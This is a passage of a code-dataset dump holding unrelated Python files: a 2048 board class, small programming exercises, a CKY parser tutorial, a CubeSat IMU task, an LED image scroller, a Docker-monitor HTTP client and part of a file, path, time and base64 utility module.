self.board[i][j] = value if isinstance(value, int) else np.random.randint(1, 3) * 2\n self._free_tiles -= 1\n\n def compress(self):\n change_flag = False\n for i in range(self.n):\n newindex = -1\n for j in range(self.n):\n if newindex == -1:\n if self.board[i][j] == 0: newindex = j\n continue\n if self.board[i][j] != 0:\n self.board[i][newindex] = self.board[i][j]\n self.board[i][j] = 0\n newindex = j\n change_flag = True\n return change_flag\n\n def merge(self):\n for i in range(self.n):\n for j in range(self.n - 1):\n if self.board[i][j] == 0 or self.board[i][j] != self.board[i][j + 1]: continue\n self.board[i][j] *= 2\n self.board[i][j + 1] = 0\n self._free_tiles += 1\n self._largest_tile_placed = max(self.board[i][j], self._largest_tile_placed)\n #self._score += self.board[i][j]\n #self._score += self.board[i][j] // 4\n #self._score += int(np.log2(self.board[i][j])) - 1\n\n def calc_score(self):\n self._score = int(np.sum(self.bonus_mask * self.board))\n\n\n def make_move(self, action):\n if not action in self.action_set: return\n {GameActions.UP: self.up, GameActions.DOWN: self.down, GameActions.LEFT: self.left, GameActions.RIGHT: self.right}[action]()\n self.add_tile()\n self.on_board_updated()\n #print('Score: {0}, Remaining tiles: {1}'.format(self.score, self._free_tiles))\n\n def up(self):\n self.board = np.rot90(self.board, axes=(0, 1))\n self.perform_action()\n self.board = np.rot90(self.board, axes=(1, 0))\n\n def down(self):\n self.board = np.rot90(self.board, axes=(1, 0))\n self.perform_action()\n self.board = np.rot90(self.board, axes=(0, 1))\n\n def left(self):\n self.perform_action()\n\n def right(self):\n self.board = np.flip(self.board, axis=1)\n self.perform_action()\n self.board = np.flip(self.board, axis=1)\n\n def perform_action(self):\n self.compress()\n self.merge()\n self.compress()\n","sub_path":"gameboard.py","file_name":"gameboard.py","file_ext":"py","file_size_in_byte":6521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"215241606","text":"bottle = [0, 0, 0, 0, 0]\r\nwater = [90, 80, 91, 99, 70]\r\n\r\nfor i in range(5):\r\n bottle[i] = int(input())\r\n\r\ntime = int(input())\r\n\r\nfor x in range(time):\r\n for y in range(5):\r\n if (bottle[y]+water[y]) > 2000:\r\n bottle[y] = water[y]\r\n else:\r\n bottle[y] = bottle[y] + water[y]\r\n\r\nmax_bottle = 0\r\nmax_quantity = 0\r\nfor i in range(5):\r\n if bottle[i] > max_quantity:\r\n max_quantity = bottle[i]\r\n max_bottle = i+1\r\n\r\nprint('%2d,%5d'%(max_bottle,max_quantity))","sub_path":"05_midterm/prob4.py","file_name":"prob4.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"374407139","text":"#Daily Coding Problem #1 [Easy]\n#Given a list of numbers and a number k, return whether any two numbers from the list add up to k\n#Ex. given [10,15,3,7] and k of 17, return true since 10+7 = 17\n#Bonus: Can you do this in one pass?\n\ndef check_sum(l,k):\n for i in range(len(l)):\n for j in range(i,len(l)):\n if(l[i]+l[j] == k):\n return True\n return False\n\nprint(check_sum([10,15,3,7],13))\n","sub_path":"day0001/dcp1_1.py","file_name":"dcp1_1.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"474731177","text":"r\"\"\"tutorial10.py\nCKY\n\n[Usage]\npython tutorial10.py main &> out\npython tutorial10.py main 2>&1 | pbcopy\n\"\"\"\nimport math\nimport os\nimport re\nimport sys\nfrom collections import defaultdict\nfrom itertools import islice\n\nfrom nltk.tree import Tree\n\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../../\"))\nfrom kiyuna.utils.message import message, Renderer # noqa: E402 isort:skip\n\nINF = float(\"inf\")\nprog = re.compile(r\"[()]\")\n\n\ndef load_grammar(grammar_file):\n \"\"\" #10 p.65 \"\"\"\n nonterm = []\n preterm = defaultdict(list) # preterm[右] := [(左, 確率) ...]\n for rule in open(grammar_file):\n lhs, rhs, prob = rule.split(\"\\t\") # P(左 -> 右) = 確率\n rhs_symbols = rhs.split()\n prob = float(prob)\n if len(rhs_symbols) == 1: # 前終端記号\n preterm[rhs] += [(lhs, math.log(prob))]\n else: # 非終端記号\n nonterm += [(lhs, rhs_symbols[0], rhs_symbols[1], math.log(prob))]\n return nonterm, preterm\n\n\ndef cky(grammar_file, input_file, s=0, t=57):\n \"\"\" #10 pp.66-67 \"\"\"\n nonterm, preterm = load_grammar(grammar_file)\n for line in islice(open(input_file), s, t):\n words = line.split()\n # best_score[sym_{i, j}] := 最大対数確率\n best_score = defaultdict(lambda: -INF)\n # best_edge[sym_{i, j}] := (lsym_{i, k}, rsym_{k, j})\n best_edge = {}\n # 前終端記号を追加\n for i in range(len(words)):\n if preterm[words[i]]:\n for lhs, log_prob in preterm[words[i]]:\n best_score[f\"{lhs} ({i} {i+1})\"] = log_prob\n # 非終端記号の組み合わせ\n for j in range(2, len(words) + 1):\n for i in range(j - 2, -1, -1):\n for k in range(i + 1, j):\n # log(P(sym -> lsym rsym)) = log prob\n for sym, lsym, rsym, logprob in nonterm:\n par = f\"{sym} ({i} {j})\"\n left = f\"{lsym} ({i} {k})\"\n right = f\"{rsym} ({k} {j})\"\n # 両方の子供の確率が 0 より大きい\n if best_score[left] == -INF:\n continue\n if best_score[right] == -INF:\n continue\n # このノード・辺の対数確率を計算\n my_lp = best_score[left] + best_score[right] + logprob\n # この辺が確率最大のものなら更新\n if my_lp > best_score[par]:\n best_score[par] = my_lp\n best_edge[par] = (left, right)\n yield get_S_expr(f\"S (0 {len(words)})\", best_edge, words)\n\n\ndef get_S_expr(sym_ij, best_edge, words):\n \"\"\" #10 p.68 \"\"\"\n sym, i, _ = prog.sub(\"\", sym_ij).split()\n if sym_ij in best_edge:\n left = get_S_expr(best_edge[sym_ij][0], best_edge, words)\n right = get_S_expr(best_edge[sym_ij][1], best_edge, words)\n return f\"({sym} {left} {right})\"\n else:\n return f\"({sym} {words[int(i)]})\"\n\n\nif __name__ == \"__main__\":\n if sys.argv[1] == \"test\":\n grammar_file = \"../../test/08-grammar.txt\"\n input_file = \"../../test/08-input.txt\"\n else:\n grammar_file = \"../../data/wiki-en-test.grammar\"\n input_file = \"../../data/wiki-en-short.tok\"\n\n s, t = 0, 1\n with Renderer(sys.argv[1]) as out:\n for i, s_expr in enumerate(cky(grammar_file, input_file, s=s, t=t)):\n message(\"=\" * 3, \"line:\", s + i, \"=\" * 3)\n tree = Tree.fromstring(s_expr)\n out.result(\"S-expression\", s_expr)\n out.result(\"nltk.tree.Tree\", tree)\n out.header(\"nltk.tree.Tree.pretty_print\")\n tree.pretty_print()\n # tree.draw()\n\n\n\"\"\"result\n[+] main\n=== line: 0 ===\n[*] 1. S-expression\n(S (PP (IN Among) (NP (DT these) (NP' (, ,) (NP' (JJ supervised) (NP' (NN learning) (NNS approaches)))))) (S' (VP (VBP have) (VP (VBN been) (VP' (NP (DT the) (NP' (ADJP (RBS most) (JJ successful)) (NNS algorithms))) (PP (TO to) (NP_NN date))))) (. .)))\n[*] 2. nltk.tree.Tree\n(S\n (PP\n (IN Among)\n (NP\n (DT these)\n (NP'\n (, ,)\n (NP' (JJ supervised) (NP' (NN learning) (NNS approaches))))))\n (S'\n (VP\n (VBP have)\n (VP\n (VBN been)\n (VP'\n (NP\n (DT the)\n (NP' (ADJP (RBS most) (JJ successful)) (NNS algorithms)))\n (PP (TO to) (NP_NN date)))))\n (. .)))\n[*] 3. nltk.tree.Tree.pretty_print\n S\n _______________________________________________|_____________________\n | S'\n | _____________________|________________________________\n | VP |\n | ____|____ |\n PP | VP |\n __________|______ | ____|________________ |\n | NP | | VP' |\n | ___________|_______ | | _______|______________________ |\n | | NP' | | NP | |\n | | ______________|_____ | | ________|_______ | |\n | | | NP' | | | NP' | |\n | | | _____________|______ | | | _______|__________ | |\n | | | | NP' | | | ADJP | PP |\n | | | | ______|______ | | | ____|_______ | ___|____ |\n IN DT , JJ NN NNS VBP VBN DT RBS JJ NNS TO NP_NN .\n | | | | | | | | | | | | | | |\nAmong these , supervised learning approaches have been the most successful algorithms to date .\n\"\"\"\n","sub_path":"kiyuna/tutorial10/tutorial10.py","file_name":"tutorial10.py","file_ext":"py","file_size_in_byte":6691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"110785157","text":"# Task to obtain IMU sensor readings\n\nfrom Tasks.template_task import Task\n\nclass task(Task):\n priority = 5\n frequency = 1/10 # once every 10s\n name='imu'\n color = 'green'\n\n async def main_task(self):\n # take IMU readings\n readings = {\n 'accel':self.cubesat.acceleration,\n 'mag': self.cubesat.magnetic,\n 'gyro': self.cubesat.gyro,\n }\n\n # store them in our cubesat data_cache object\n self.cubesat.data_cache.update({'imu':readings})\n\n # print the readings with some fancy formatting\n self.debug('IMU readings (x,y,z)')\n for imu_type in self.cubesat.data_cache['imu']:\n self.debug('{:>5} {}'.format(imu_type,self.cubesat.data_cache['imu'][imu_type]),2)\n\n\n\n","sub_path":"basic/Tasks/imu_task.py","file_name":"imu_task.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"638515924","text":"from random import randint\n\n# Imports \nimport random\nimport math\nimport string\n\n#Define all functions to be used\ndef isprime(n):\n n = abs(int(n))\n if n < 2:\n return False\n if n == 2: \n return True \n if not 1 & n: \n return False\n for p in range(3, int(n**0.5) + 1, 2):\n if n % p == 0:\n return False\n return True\n\ndef vowel_count(string):\n count = 0\n for x in string:\n if x in ['a','e','i','o','u']:\n count=count+1\n return count\n\ndef sort_by_vowel_count(word):\n return word.sort(key=vowel_count,reverse=True)\n\n\n\nstudentNumber = input(\"Student Number: \")\nprint (\"\")\ntype(studentNumber)\nsNumber = [int(i) for i in str(studentNumber)]\nprint (\"Accepted the student number: \" + studentNumber)\nprint (\"\")\nsNumLen = len(sNumber)\n\nprint ()\np = 0\n\nfor i in range (0, sNumLen):\n \n if (isprime(sNumber[i])):\n p += 1\n \nif p == 0:\n print (\"Note: No Prime Numbers were found. Defaulting to 1 in order to allow division.\")\n p += 1\n print (\"1. The number of prime numbers in this student number is: \", p)\nelse:\n print (\"1. The number of prime numbers in this student number is: \", p)\nprint (\" \")\n\nq = 30\n\nprint (\"The Value of q before randomizing the number: \", q)\nprint (\" \")\nq = randint(24,51)\nprint (\"2. The Random number now is: \", q)\nprint (\" \")\n\n\nr = math.floor(q / p)\n\nprint (\"3. The number of strings to be generated is: \", r)\nprint (\" \")\n\nprint (\"4. List of Strings: \")\nprint (\"-----------------\")\n\n\narrWords = []\nboolSwitch = True\nfor i in range(0,r):\n if boolSwitch:\n arrWords.append(''.join(random.choices(string.ascii_lowercase, k=5)))\n boolSwitch = False\n else:\n arrWords.append(''.join(random.choices(string.ascii_lowercase, k=7)))\n boolSwitch = True\n\nfor i in range(0, r):\n print (i, \" - \",arrWords[i])\n\nprint (\"-----------------\") \n\nprint (\"\")\nprint (\"5. Sorted List:\")\nprint (\"-----------------\") \n\n\narrWords.sort(key = vowel_count, reverse = True)\nfor i in range(0, r):\n print (i, \" - \", arrWords[i], \"(Vowels:\", vowel_count(arrWords[i]),\")\")\nprint (\"-----------------\") \n\n\n\n\n\n\n\n\n\n\n","sub_path":"Python/Act10.py","file_name":"Act10.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"397837963","text":"#! /usr/bin/env python3\n\n#\n# Copyright (c) 2015 Bitlair\n#\n\n# Requires the Pillow library\n\nimport ledbanner\nimport sys\nimport time\nfrom PIL import Image\n\nif len(sys.argv) == 1:\n\tprint('Usage: %s [ ...]' % sys.argv[0])\n\texit(1)\n\ndef read_image(filename):\n\timg = Image.open(filename)\n\timg.thumbnail((led.size.x, float('inf')))\n\treturn img\n\nled = ledbanner.LEDBanner()\nimages = []\n\nfor f in sys.argv[1:]:\n\ttry:\n\t\timage = read_image(f)\n\t\timage_size = ledbanner.Vector(image.size[0], image.size[1])\n\t\traw = bytearray(image_size.x * image_size.y * led.bytes_per_pixel)\n\t\tfor x in range(0, image_size.x):\n\t\t\tfor y in range(0, image_size.y):\n\t\t\t\tpix = image.getpixel((x, y))\n\t\t\t\tif type(pix) is int: # Monochrome\n\t\t\t\t\tpix = (pix, pix, pix)\n\t\t\t\ti = (y * led.size.x + x) * led.bytes_per_pixel\n\t\t\t\traw[i:i+3] = pix\n\t\timages.append((raw, image_size))\n\texcept:\n\t\tpass\nif len(images) == 0:\n\tprint('Unable to read any of the specified images')\n\texit(1)\n\nwhile 1:\n\tfor image, image_size in images:\n\t\tfor scroll in range(led.size.y, -image_size.y, -1):\n\t\t\tframe = led.make_frame()\n\n\t\t\tframe_start_y = scroll\n\t\t\tif frame_start_y < 0:\n\t\t\t\tframe_start_y = 0\n\t\t\tframe_stop_y = scroll + image_size.y\n\t\t\tif frame_stop_y > led.size.y:\n\t\t\t\tframe_stop_y = led.size.y\n\t\t\timage_start_y = -scroll\n\t\t\tif image_start_y < 0:\n\t\t\t\timage_start_y = 0\n\t\t\timage_stop_y = image_start_y + frame_stop_y - frame_start_y\n\t\t\tif image_stop_y > image_size.y:\n\t\t\t\timage_stop_y = image_size.y\n\n\t\t\tbytes_per_y = led.size.x * led.bytes_per_pixel\n\t\t\tframe[frame_start_y * bytes_per_y:frame_stop_y * bytes_per_y] = \\\n\t\t\t\timage[image_start_y*bytes_per_y:image_stop_y*bytes_per_y]\n\n\t\t\tled.set_frame(frame)\n\t\t\ttime.sleep(1 / led.fps)\n","sub_path":"programs/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"216976424","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Song of Pi\n# https://www.hackerrank.com/challenges/song-of-pi\n\nt = int(input())\np = '31415926535897932384626433833'\nfor i in range(t):\n s = input().split()\n song = True\n for j in range(len(s)):\n if len(s[j]) != int(p[j]):\n song = False\n if song == True:\n print('It\\'s a pi song.')\n else:\n print('It\\'s not a pi song.')\n","sub_path":"songofpi.py","file_name":"songofpi.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"62642362","text":"\"\"\"\nA python module to interact with ha-dockermon.\nThis code is released under the terms of the MIT license. See the LICENSE\nfile for more details.\n\"\"\"\nimport requests\n\nclass Dockermon:\n \"\"\"This class is used to interact with ha-dockermon.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize\"\"\"\n\n def listContainers(self, host, port='8126'):\n \"\"\"Get a list of all containers not in exclude list.\"\"\"\n BASE = 'http://' + host + ':' + port\n fetchUrl = BASE + '/containers'\n try:\n containers = requests.get(fetchUrl)\n except:\n return False\n else:\n if containers:\n return containers.json()\n else:\n return False\n\n def getContainerState(self, container, host, port='8126'):\n \"\"\"Get the state of a container.\"\"\"\n BASE = 'http://' + host + ':' + port\n fetchUrl = BASE + '/container/' + container\n try:\n containerState = requests.get(fetchUrl)\n except:\n return False\n else:\n if containerState:\n return containerState.json()\n else:\n return False\n\n def getContainerStats(self, container, host, port='8126'):\n \"\"\"Get the state of a container.\"\"\"\n BASE = 'http://' + host + ':' + port\n fetchUrl = BASE + '/container/' + container + '/stats'\n try:\n containerStats = requests.get(fetchUrl)\n except:\n return False\n else:\n if containerStats:\n return containerStats.json()\n else:\n return False\n\n def startContainer(self, container, host, port='8126'):\n \"\"\"Start a spesified container\"\"\"\n BASE = 'http://' + host + ':' + port\n commandUrl = BASE + '/container/' + container + '/start'\n try:\n runCommand = requests.get(commandUrl)\n except:\n return False\n else:\n if runCommand:\n return True\n else:\n return False\n\n def stopContainer(self, container, host, port='8126'):\n \"\"\"Start a spesified container\"\"\"\n BASE = 'http://' + host + ':' + port\n commandUrl = BASE + '/container/' + container + '/stop'\n try:\n runCommand = requests.get(commandUrl)\n except:\n return False\n else:\n if runCommand:\n return True\n else:\n return False","sub_path":"pydockermon/pydockermon/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"583079512","text":"lst=list(map(int, input().split()))\nwhile len(lst)==2:\n n, m=lst\n info=[[0]*(n+1) for i in range(n+1)]\n for i in range(1, n+1):\n info[i][i]=1\n for i in range(m):\n a, b, p=map(int, input().split())\n info[a][b]=p/100\n info[b][a]=p/100\n for k in range(1, n+1):\n for i in range(1, n+1):\n for j in range(1, n+1):\n info[i][j]=max(info[i][j], info[i][k]*info[k][j])\n print(\"%.6f percent\"%(info[1][n]*100))\n lst=list(map(int, input().split()))\n","sub_path":"BOJ/6528.py","file_name":"6528.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"39577948","text":"# -*- coding:utf-8 -*-\n# author : alexloser\n# note : python3.4+\n\"\"\" The basic part of bace3 module \"\"\"\nimport sys, os, _io\nimport gc, inspect, traceback\nimport functools\nimport base64, json\nfrom _io import DEFAULT_BUFFER_SIZE, BytesIO\nfrom pathlib import Path\nfrom platform import platform\nfrom urllib.parse import unquote_plus\nfrom time import time, strftime, localtime, sleep\nfrom datetime import datetime, date\ntry:\n from _hashlib import openssl_md5 as _md5hash\nexcept ImportError:\n from hashlib import md5 as _md5hash\n\n# Define current python version, should be (3. x)\nPythonVersion = (sys.version_info.major, sys.version_info.minor)\n# The number of logical cores in cpu, return None if indeterminable\nNCPU = os.cpu_count()\n\n# Recursive function calling stack limits\nDEFAULT_RECURSION_LIMIT = 1000\nBIGGER_RECURSION_LIMIT = 4096\n\n# PVM checking time interval\nDEFAULT_CHECK_INTERVAL = 100\nLONGER_CHECK_INTERVAL = 1024\n\n# PVM GC threshold\nDEFAULT_GC_THRESHOLD = (700, 10, 10)\nLOWER_GC_THRESHOLD = (512, 8, 4)\nHIGHER_GC_THRESHOLD = (1024, 32, 16)\n\n# Bytes constants\nKB = 1024\nMB = 1024 << 10\nGB = 1024 << 20\n\n# IO buffer size\nBEST_IO_BUFFER_SIZE = 2*DEFAULT_BUFFER_SIZE\n\n# Max file size can be read into memory\nMAX_FILE_SIZE_32BIT = 2*GB\n\n# For indexing readable weekday strings\nWEEKDAYS0_EN = (None, 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday')\nWEEKDAYS_EN = ('Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday')\nWEEKDAYS_ZHCN = ('星期一', '星期二', '星期三', '星期四', '星期五', '星期六', '星期日')\n\ndef reconfig():\n \"\"\" Set global PVM configs \"\"\"\n cfg = {}\n cfg['sys.platform'] = sys.platform\n cfg['sys.maxsize'] = sys.maxsize\n cfg['sys.path'] = sys.path\n cfg['sys.excepthook'] = sys.excepthook\n cfg['old sys.switchinterval'] = sys.getswitchinterval()\n sys.setswitchinterval(LONGER_CHECK_INTERVAL)\n cfg['new sys.switchinterval'] = sys.getswitchinterval()\n cfg['old sys.recursionlimit'] = sys.getrecursionlimit()\n sys.setrecursionlimit(BIGGER_RECURSION_LIMIT)\n cfg['new sys.recursionlimit'] = sys.getrecursionlimit()\n cfg['old gc.threshold'] = str(gc.get_threshold())\n gc.set_threshold(*LOWER_GC_THRESHOLD)\n cfg['new gc.threshold'] = str(gc.get_threshold())\n sys._clear_type_cache()\n cfg['sys._clear_type_cache'] = True\n return cfg\n\n\ndef get_caller(depth=1) -> str:\n \"\"\" Get caller of current frame \"\"\"\n cf = inspect.currentframe()\n for _ in range(depth + 1):\n cf = cf.f_back\n try:\n return '[%s] ' % inspect.getframeinfo(cf).function\n except AttributeError:\n return '[%s] ' % inspect.getframeinfo(inspect.currentframe()).function\n\n\ndef is_iterable(obj):\n \"\"\" Check for the `__iter__` attribute so that this can cover types that \n don't have to be known by this module, such as NumPy arrays. \"\"\"\n return hasattr(obj, '__iter__') and not isinstance(obj, str)\n\n\ndef to_bytes(obj:object) -> bytes:\n \"\"\" Get bytes of object if supported, \n using 'ascii' or 'utf-8' as defualt string encode \n \"\"\"\n if isinstance(obj, str):\n try:\n return bytes(obj, 'ascii')\n except UnicodeEncodeError:\n return bytes(obj, 'utf-8')\n elif isinstance(obj, (bytes, bytearray)):\n return obj\n return memoryview(obj).tobytes()\n\n\ndef utf8(s, errors='replace') -> str:\n \"\"\" Transform str to 'utf-8' coding \"\"\"\n return str(s, 'utf-8', errors=errors)\n\n\ndef debug(*args, **kwargs):\n \"\"\" Print to stderr not stdout \"\"\"\n ts = time()\n dt = strftime('%F %T') + ('.%03d' % ((ts - int(ts)) * 1000))\n print(dt, *args, file=sys.stderr, flush=True, **kwargs)\n\ndef print_error(name, output=sys.stderr):\n \"\"\" Print exception with extra info(name) and limit traceback in 2 \"\"\"\n assert name\n assert output is sys.stderr or output is sys.stdout\n exc_type, exc_val, exc_tb = sys.exc_info()\n exc_type = str(exc_type).lstrip('class <').rstrip('>')\n sys.stderr.write('%s : %s from :%s\\n' % (exc_type, exc_val, name))\n traceback.print_tb(exc_tb, limit=2, file=output)\n\ndef fmterr(depth=2):\n \"\"\" Print exception with extra info(name) and limit traceback in 2 \"\"\"\n _, _, exc_tb = sys.exc_info()\n return ''.join(traceback.format_tb(exc_tb, limit=depth)).replace('\\n', '').strip()\n\ndef class_name(name):\n \"\"\" return object's class name \"\"\"\n return str(name).split('.')[-1][:-2]\n\ndef md5(buf:bytes) -> str:\n \"\"\" Get md5 hexdigest of bytes \"\"\"\n return _md5hash(buf).hexdigest()\n\n\ndef default_release_dirs(*extra) -> list:\n \"\"\" Get default dirs that release executables exist(possible) \"\"\"\n home = str(Path.home()) + os.sep\n possible = ['github', 'bitbucket', 'gitlab', 'develop', 'projects', 'workspace', 'Go']\n for s in set(extra):\n if s not in possible:\n possible.append(s)\n return [home + s for s in possible]\n\n\ndef search_program(name, where):\n \"\"\" Find executable program in possiable dir.\n Search for path in `where` first, then the `default_release_dirs()`.\n \"\"\"\n if isinstance(where, (list, tuple, set)):\n for d in where:\n if not d.endswith(os.sep):\n d += os.sep\n if os.path.isfile(d + name):\n return d + name\n elif isinstance(where, str):\n if not where.endswith(os.sep):\n where += os.sep\n if os.path.isfile(where + name):\n return where + name\n for d in default_release_dirs():\n if not d.endswith(os.sep):\n d += os.sep\n if os.path.exists(d + name):\n return d + name\n return None\n\n\ndef add_sys_path(name:str) -> bool:\n \"\"\" Add name into sys.path \"\"\"\n if name in sys.path:\n return False\n sys.path.insert(0, name)\n return True\n\ndef user_dir():\n \"\"\" Get current user's dir with os.sep \"\"\"\n return os.path.expanduser('~') + os.sep\n\ndef home_dir():\n \"\"\" Get home dir of current user with os.sep \"\"\"\n return str(Path.home()) + os.sep\n\ndef cur_dir():\n \"\"\" Get current dir of fn \"\"\"\n return str(Path(os.path.curdir).absolute())\n\ndef parent_dir(fn):\n \"\"\" Get parent directory of existed filename \"\"\"\n return str(Path(fn).parent.absolute()) + os.sep\n\ndef grand_dir(fn):\n \"\"\" Get grand father directory of existed filename \"\"\"\n return parent_dir(parent_dir(fn))\n\ndef basename(fn):\n \"\"\" Get base name of filename \"\"\"\n return os.path.basename(os.path.realpath(fn))\n\ndef dirname(fn):\n \"\"\" Get directory name of filename with os.sep \"\"\"\n return os.path.dirname(os.path.realpath(fn)) + os.sep\n\ndef filetime(fn) -> tuple:\n \"\"\" Get file time, return (ctime, mtime, atime) \"\"\"\n assert os.path.exists(fn)\n fstat = os.lstat(fn)\n ct, mt, at = fstat.st_ctime, fstat.st_mtime, fstat.st_atime\n return (localtime(ct), localtime(mt), localtime(at))\n\ndef span_wildcard(path:str, wildcard:str) -> list:\n \"\"\" Get a list contains after span the wildcard in path \"\"\"\n # print(os.path.realpath(path))\n return [str(p) for p in Path(os.path.realpath(path)).glob(wildcard)]\n\ndef span_wildcard_recurse(path:str, wildcard:str) -> list:\n \"\"\" Same as span_wildcard, but recursive \"\"\"\n # print(os.path.realpath(path))\n return [str(p) for p in Path(os.path.realpath(path)).rglob(wildcard)]\n\n\ndef is_valid_dir(*args) -> bool:\n \"\"\" Check is valid dir \"\"\"\n for d in args:\n assert isinstance(d, str)\n if not os.path.isdir(d):\n return False\n if d[0] in ('.', '~'):\n return False\n if 'linux' in platform().lower():\n return d.startswith('/')\n return True\n\n\ndef scan_dir(path) -> tuple:\n \"\"\" Like list_dir, but without recursive!!! \"\"\"\n if sys.version_info.minor >= 5:\n return tuple(os.scandir(path))\n else:\n return os.listdir(path)\n\n\ndef file_monitor(filename, interval=0.5, repeat=2) -> bool:\n \"\"\" Monitor any changes of file, return if \n no changes after speciafic time(interval * repeat). \"\"\"\n if os.path.isfile(filename) and os.path.exists(filename):\n t = filetime(filename)\n n = os.path.getsize(filename)\n for _ in range(repeat):\n sleep(interval)\n if filetime(filename) != t:\n return False\n if n != os.path.getsize(filename):\n return False\n return True\n raise FileNotFoundError(filename)\n \n\ndef recursive_encode(s:str, level=9, method=[]) -> str:\n \"\"\" Recursive encode `s` using base64,\n `level` is depth of recursive, the max value is 32 \"\"\"\n assert 0 < level <= 32\n if not isinstance(s, (bytearray, bytes)):\n s = bytes(s, 'utf-8')\n if method:\n for coder in method:\n s = coder(s)\n return str(s, 'utf-8')\n else:\n if level <= 1:\n return str(base64.b85encode(s), 'utf-8')\n return recursive_encode(base64.b64encode(s), level - 1)\n\ndef __recursive_decode(s:str, level) -> str:\n \"\"\" Recursive decode `s`(encoded by `recursive_encode`) using base64,\n `level` is depth of recursive, the max value is 32 \"\"\"\n if not isinstance(s, (bytearray, bytes)):\n s = bytes(s, 'utf-8')\n if level <= 1:\n return str(base64.b64decode(s), 'utf-8')\n return __recursive_decode(base64.b64decode(s), level - 1)\n\ndef recursive_decode(s:str, level=9, method=[]) -> str:\n \"\"\" Recursive decode `s`(encoded by `recursive_encode`) using base64,\n `level` is depth of recursive, the max value is 32 \"\"\"\n assert 0 < level <= 32\n if not isinstance(s, (bytearray, bytes)):\n s = bytes(s, 'utf-8')\n if method:\n for coder in method:\n s = coder(s)\n return str(s, 'utf-8')\n else:\n s = str(base64.b85decode(s), 'utf-8')\n if level <= 1:\n return s\n return __recursive_decode(s, level - 1)\n\n\ndef isotime():\n \"\"\" Return iso datetime, like 2014-03-28 19:45:59 \"\"\"\n return strftime('%F %T')\n\ndef is_time(hms_in_24h:str):\n \"\"\" Check now is specify time \"\"\"\n return strftime('%H:%M:%S') == hms_in_24h\n\n\ndef time_meter(src=os.path.basename(__file__)):\n \"\"\" Print time when enter wrapped function and leave wrapped function \"\"\"\n def _wrapper(func):\n @functools.wraps(func)\n def _call(*args, **kwargs):\n debug(isotime() + (' %s : %s started...' % (src, _call.__name__)))\n ret = func(*args, **kwargs)\n debug(isotime() + (' %s : %s finished...' % (src, _call.__name__)))\n return ret\n return _call\n return _wrapper\n\n\ndef make_calendar(year=None) -> list:\n \"\"\" Return a list contains all days datetime object with weekday in the `year` \"\"\"\n if not year:\n year = datetime.today().year\n cld = [None]\n for i in range(1, 13):\n month = [(None, None)]\n for j in range(1, 32):\n try:\n dt = date(year, i, j)\n month.append((dt, WEEKDAYS_EN[dt.weekday()]))\n except ValueError:\n pass\n cld.append(month)\n return cld\n\n\ndef make_week_table(year=None) -> dict:\n \"\"\" Return a table of collected days on each weeks in a year(always 52 weeks) \"\"\"\n if not year:\n year = datetime.today().year\n cld = make_calendar(year)\n wdt = {}\n if cld[1][1][1] == 'Monday':\n num = 0\n else:\n num = 1\n for m in cld[1:]:\n for d, w in m:\n if not d:\n continue\n if w == 'Monday':\n num += 1\n wdt[d] = num\n return wdt\n\n\ndef date_delta(y1, m1, d1, y2, m2, d2):\n \"\"\" Return timedelta object of two date, eg:\n d = date_delta(2015, 3, 2, 2016, 3, 2)\n \"\"\"\n y1, m1, d1 = int(y1), int(m1), int(d1)\n y2, m2, d2 = int(y2), int(m2), int(d2)\n d1 = datetime(y1, m1, d1, 0, 0, 0)\n d2 = datetime(y2, m2, d2, 0, 0, 0)\n return d2 - d1 if d2 > d1 else d1 - d2\n\n\ndef time_delta(H1, M1, S1, H2, M2, S2):\n \"\"\" Return timedelta object of two time, eg:\n d = time_delta(22, 33, 44, 23, 59, 0)\n \"\"\"\n H1, M1, S1 = int(H1), int(M1), int(S1)\n H2, M2, S2 = int(H2), int(M2), int(S2)\n d1 = datetime(1970, 1, 1, H1, M1, S1)\n d2 = datetime(1970, 1, 1, H2, M2, S2)\n return d2 - d1 if d2 > d1 else d1 - d2\n\n\ndef datetime_delta(y1, m1, d1, H1, M1, S1, y2, m2, d2, H2, M2, S2):\n \"\"\" Return timedelta object of two datetime \"\"\"\n y1, m1, d1, H1, M1, S1 = int(y1), int(m1), int(d1), int(H1), int(M1), int(S1)\n y2, m2, d2, H2, M2, S2 = int(y2), int(m2), int(d2), int(H2), int(M2), int(S2)\n d1 = datetime(y1, m1, d1, H1, M1, S1)\n d2 = datetime(y2, m2, d2, H2, M2, S2)\n return d2 - d1 if d2 > d1 else d1 - d2\n\n\ndef urlsplit(url:str) -> (str, str, str):\n \"\"\" Split `url` to 3 part: raw url, url without params, url domain \"\"\"\n url = trimhttp(url)\n seps = url.split('?', 1)\n host = seps[0].split('/', 1)[0]\n if len(seps) > 1:\n return host, seps[0], seps[1]\n else:\n return host, seps[0], ''\n\ndef urlsplit2(url:bytes) -> (bytes, bytes, bytes):\n \"\"\" Split `url` to 3 part: raw url, url without params, url domain \"\"\"\n url = trimhttp2(url)\n seps = url.split(b'?', 